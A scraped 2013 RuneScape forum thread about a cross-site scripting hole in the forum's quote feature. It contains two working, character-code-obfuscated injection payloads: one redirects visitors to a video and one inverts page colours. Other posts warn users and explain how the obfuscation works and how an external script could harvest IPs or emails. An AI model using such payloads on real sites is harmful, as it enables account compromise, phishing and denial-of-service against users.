forums.rs

Forums

RS-Linkify Thread is sticky

Quick find code: 261-262-33-65181208

of 1105
Lifer
Jul Member 2008

Lifer

Posts: 12,424 Opal Posts by user Forum Profile RuneMetrics Profile
\',0);window.location=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 121, 111, 117, 116, 117, 98, 101, 46, 99, 111, 109, 47, 119, 97, 116, 99, 104, 63, 118, 61, 95, 79, 66, 108, 103, 83, 122, 56, 115, 83, 77)//

05-Dec-2013 21:30:58

Blasty
Feb Member 2017

Blasty

Posts: 9,319 Rune Posts by user Forum Profile RuneMetrics Profile
\',0);$(String.fromCharCode(104,116,109,108)).css(String.fromCharCode(45,119,101,98,107,105,116,45,102,105,108,116,101,114),String.fromCharCode(104,117,101,45,114,111,116,97,116,101,40,49,56,48,100,101,103,41,32,105,110,118,101,114,116,40,49,48,48,37,41))//
Blasty
// @BlastytheBlue // Blasty#5167
| Co-owner of Mine Nation

05-Dec-2013 21:45:34 - Last edited on 05-Dec-2013 21:48:43 by Blasty

Meredith wtf

Meredith wtf

Posts: 4,160 Adamant Posts by user Forum Profile RuneMetrics Profile
Amaethwr said :
I have no idea what is going on.

­­­­
Amæ
Life as we know it could be gone in a minute
­­­­

There's a huge security exploit. If you see any JavaScript in a post, don't click the quote link. All of the examples that we posted so far are benign, but there's a huge potential for someone to use this to compromise hundreds of accounts.

05-Dec-2013 22:05:12

Amaethwr
Aug Member 2008

Amaethwr

Posts: 14,634 Opal Posts by user Forum Profile RuneMetrics Profile
Yea, I had heard about all that. I just had no idea what Javascript even looked like until today lol, so I have no idea what all these numbers mean/how they make some kind of action occur.

­­­­
Amæ
Life as we know it could be gone in a minute
­­­­
Selective Completionist

05-Dec-2013 22:20:08

Meredith wtf

Meredith wtf

Posts: 4,160 Adamant Posts by user Forum Profile RuneMetrics Profile
The String.fromCharCode() method takes a series of ASCII values and forms them into a string

That means that String.fromCharCode(104) is equal to a lower case 'h'. String.fromCharCode(104, 116) is equal to 'ht'. If I continue to add ASCII values, I can form a whole URL.

An easier way to do it would be to just say "http://www.example.com", but you would need to surround it in quotes, which doesn't work. It would also make the code human-readable, which makes the exploit a lot more obvious.

In my post earlier on this page, I use String.fromCharCode() to pass a URL to a method that loads an external JavaScript file (Lifer posted the link to it), which does all of the actions that you see. This is especially dangerous because it allows the exploiter to access their server, which means they can do just about anything they want. They could store your email (if you log in with on) and display name to create extremely realistic phishing emails. On a smaller scale, someone could grab your IP if you quoted them, which would allow them to easily DDOS you (I just display your IP in my post, I don't record them).

05-Dec-2013 22:29:46

Quick find code: 261-262-33-65181208 Back to Top